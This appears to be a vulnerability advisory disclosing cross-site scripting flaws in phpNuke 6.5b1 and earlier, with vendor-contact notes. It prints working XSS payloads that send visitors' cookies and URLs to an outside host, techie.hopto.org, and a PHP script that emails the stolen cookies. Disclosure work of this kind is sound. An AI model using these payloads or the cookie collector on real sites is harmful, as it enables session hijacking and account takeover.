|
|
|
|
| |
| phpNuke is a popular, and very complex content manager that runs on UNIX, Mac, and Windows systems with a MySQL or similar backend database. Many of the content manager's modules contain serious vulnerabilities that allow attackers to hijack or disable user accounts, and possibly gain administrative privileges. Gaining such privileges could likely assist further compromise of the susceptible system. |
| |
Credit:
The information has been provided by Matthew Murphy.
|
| |
Vulnerable systems:
* phpNuke 6.5b1 and prior
I. Search Module Vulnerability
The search module of phpNuke applies absolutely no filtering at all when returning the "Results for x..." page, and as a result is susceptible to cross-site scripting via a simple query such as:
<SCR*IPT>location.href="http://www.techie.hopto.org/fetch.php?email=mattmurph
y@kc.rr.com&ref="+document.URL+"cookie="+document.cookie;
II. Multiple Module Extended Tag Vulnerabilities
phpNuke does a decent job of stripping known malicious tags, but doesn't take into account the fact that even "safe" tags can have malicious properties. This enables cross-site scripting against the PM module, Discussion module, News module, etc. so basically any module that accepts user input for an article, message, or comment, can be attacked with HTML such as:
<B STYLE="left:expression(eval('location.href=\'http://www.techie.hopto.org/fet
ch.php?email=mattmurphy@kc.rr.com&ref=\'+document.URL+\'cookie=\'+document.c
ookie'))">Bold text -- or an attack?</B>
<B ONCLICK="location.href='http://www.techie.hopto.org/fetch.php?email=mattmurp
hy@kc.rr.com&ref='+document.URL+'cookie='+document.cookie">Don't Click</B>
<B ONMOUSEOVER="location.href='http://www.techie.hopto.org/fetch.php?email=matt
murphy@kc.rr.com&ref='+document.URL+'cookie='+document.cookie">Keep
Away!</B>
Exploit Script
<?php
error_reporting(0);
$redir_ref = TRUE;
mail($_GET["email"], "phpNuke Cookie", $_GET["cookie"]);
if ($redir_ref) {
header("Location: ".urlencode($_GET["ref"]));
}
?>
Vendor Response:
Matthew Murphy has contacted www.phpnuke.org through a private message, but if anyone knows a more reliable contact for them, please do use it, as this is not likely the only route of contact. Matthew Murphy sent a PM to "nukelite" with an example exploit in it. Matthew Murphy expects that future BETA releases will eliminate this vulnerability.
|
|
|
|
|
|
|
|
|
|
